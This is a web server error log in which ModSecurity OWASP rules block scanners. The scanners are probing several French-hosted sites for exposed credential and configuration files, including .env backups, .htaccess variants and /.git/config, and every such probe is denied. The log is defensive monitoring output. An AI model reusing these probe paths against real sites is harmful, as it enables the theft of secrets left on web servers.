[Mon May 11 12:07:41.858560 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:19216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /java/.env.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/java/.env.bak2024"] [unique_id "agGqbb4KNmD_mZ_vlf8-rgAAAFA"]
[Mon May 11 12:07:41.861977 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:19216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/java/.env.bak2024"] [unique_id "agGqbb4KNmD_mZ_vlf8-rgAAAFA"]
[Mon May 11 12:07:42.500337 2026] [authz_core:error] [pid 1254328:tid 1254347] [client 145.239.65.226:45000] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/flo_stylekits_config/error_log
[Mon May 11 12:07:43.033223 2026] [security2:error] [pid 1254242:tid 1254261] [client 185.177.72.9:19216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqbb4KNmD_mZ_vlf8-rgAAAFA"]
[Mon May 11 12:07:43.059837 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:19226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /java/.env.bak2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/java/.env.bak2024"] [unique_id "agGqb0YQeUtAPynIs6xeUAAAABc"]
[Mon May 11 12:07:43.060191 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:19226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/java/.env.bak2024"] [unique_id "agGqb0YQeUtAPynIs6xeUAAAABc"]
[Mon May 11 12:07:44.292264 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:19226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqb0YQeUtAPynIs6xeUAAAABc"]
[Mon May 11 12:07:44.320898 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:27490] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env.example2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/jenkins/.env.example2023"] [unique_id "agGqcERdw2n9wv6Ai48MhQAAAI8"]
[Mon May 11 12:07:44.321508 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:27490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/jenkins/.env.example2023"] [unique_id "agGqcERdw2n9wv6Ai48MhQAAAI8"]
[Mon May 11 12:07:45.473866 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:27490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqcERdw2n9wv6Ai48MhQAAAI8"]
[Mon May 11 12:07:45.500285 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:27492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env.example2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/jenkins/.env.example2023"] [unique_id "agGqcZkIEwRJMyDaV55TyAAAAUQ"]
[Mon May 11 12:07:45.503879 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:27492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/jenkins/.env.example2023"] [unique_id "agGqcZkIEwRJMyDaV55TyAAAAUQ"]
[Mon May 11 12:07:45.666992 2026] [autoindex:error] [pid 1254212:tid 1254221] [client 3.18.186.238:38358] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 12:07:46.721769 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:27492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqcZkIEwRJMyDaV55TyAAAAUQ"]
[Mon May 11 12:07:54.282353 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 145.239.65.226:53906] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/widgets/error_log
[Mon May 11 12:07:55.681210 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 145.239.65.226:53906] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/widgets/error_log
[Mon May 11 12:07:56.626164 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:2050] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jest/.env.test-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/jest/.env.test-old"] [unique_id "agGqfJkIEwRJMyDaV55T5AAAAUs"]
[Mon May 11 12:07:56.626370 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:2050] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/jest/.env.test-old"] [unique_id "agGqfJkIEwRJMyDaV55T5AAAAUs"]
[Mon May 11 12:07:57.088792 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 145.239.65.226:53906] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/widgets/error_log
[Mon May 11 12:07:57.778272 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:2050] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqfJkIEwRJMyDaV55T5AAAAUs"]
[Mon May 11 12:07:57.804234 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:2062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jest/.env.test-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/jest/.env.test-old"] [unique_id "agGqfURdw2n9wv6Ai48MrAAAAII"]
[Mon May 11 12:07:57.804728 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:2062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/jest/.env.test-old"] [unique_id "agGqfURdw2n9wv6Ai48MrAAAAII"]
[Mon May 11 12:07:58.699290 2026] [authz_core:error] [pid 1254212:tid 1254217] [client 145.239.65.226:53906] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/widgets/error_log
[Mon May 11 12:07:59.026214 2026] [security2:error] [pid 1254328:tid 1254333] [client 185.177.72.9:2062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqfURdw2n9wv6Ai48MrAAAAII"]
[Mon May 11 12:08:06.483832 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:54556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /karma/.env.example2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/karma/.env.example2023"] [unique_id "agGqhpkIEwRJMyDaV55T7AAAAVU"]
[Mon May 11 12:08:06.484290 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:54556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/karma/.env.example2023"] [unique_id "agGqhpkIEwRJMyDaV55T7AAAAVU"]
[Mon May 11 12:08:07.650050 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:54556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqhpkIEwRJMyDaV55T7AAAAVU"]
[Mon May 11 12:08:07.677011 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:54570] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /karma/.env.example2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/karma/.env.example2023"] [unique_id "agGqh0Rdw2n9wv6Ai48MxQAAAI0"]
[Mon May 11 12:08:07.677317 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:54570] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/karma/.env.example2023"] [unique_id "agGqh0Rdw2n9wv6Ai48MxQAAAI0"]
[Mon May 11 12:08:08.884341 2026] [security2:error] [pid 1254328:tid 1254344] [client 185.177.72.9:54570] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqh0Rdw2n9wv6Ai48MxQAAAI0"]
[Mon May 11 12:08:33.419747 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:13674] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /lib/.htaccess.release"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/lib/.htaccess.release"] [unique_id "agGqoWS6k_SCYd1AVZq0-wAAARM"]
[Mon May 11 12:08:33.419963 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:13674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.htaccess.release"] [unique_id "agGqoWS6k_SCYd1AVZq0-wAAARM"]
[Mon May 11 12:08:34.597492 2026] [security2:error] [pid 1254179:tid 1254200] [client 185.177.72.9:13674] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqoWS6k_SCYd1AVZq0-wAAARM"]
[Mon May 11 12:08:34.620987 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13686] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /lib/.htaccess.release"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/lib/.htaccess.release"] [unique_id "agGqohjZymfuKpjWXeiC8wAAANI"]
[Mon May 11 12:08:34.621387 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13686] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.htaccess.release"] [unique_id "agGqohjZymfuKpjWXeiC8wAAANI"]
[Mon May 11 12:08:35.875881 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:13686] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGqohjZymfuKpjWXeiC8wAAANI"]
[Mon May 11 12:08:44.254616 2026] [security2:error] [pid 1254328:tid 1254350] [client 35.187.173.76:41008] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "krakoukas.com"] [uri "/.git/config"] [unique_id "agGqrERdw2n9wv6Ai48NJwAAAJQ"]
[Mon May 11 12:08:44.254863 2026] [security2:error] [pid 1254328:tid 1254350] [client 35.187.173.76:41008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "krakoukas.com"] [uri "/.git/config"] [unique_id "agGqrERdw2n9wv6Ai48NJwAAAJQ"]
[Mon May 11 12:08:45.683099 2026] [security2:error] [pid 1254328:tid 1254350] [client 35.187.173.76:41008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "krakoukas.com"] [uri "/cgi-sys/ea-php80/index.php"] [unique_id "agGqrERdw2n9wv6Ai48NJwAAAJQ"]
[Mon May 11 12:09:08.951421 2026] [security2:error] [pid 1254212:tid 1254226] [client 102.165.5.90:31293] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGqxEYQeUtAPynIs6xe_AAAAAw"], referer: https://www.piregwan-genesis.com/
[Mon May 11 12:09:33.711938 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40798] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env.backup.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/logs/.env.backup.orig"] [unique_id "agGq3RjZymfuKpjWXeiDTwAAAMs"]
[Mon May 11 12:09:33.712465 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/logs/.env.backup.orig"] [unique_id "agGq3RjZymfuKpjWXeiDTwAAAMs"]
[Mon May 11 12:09:35.317881 2026] [security2:error] [pid 1254133:tid 1254147] [client 185.177.72.9:40798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGq3RjZymfuKpjWXeiDTwAAAMs"]
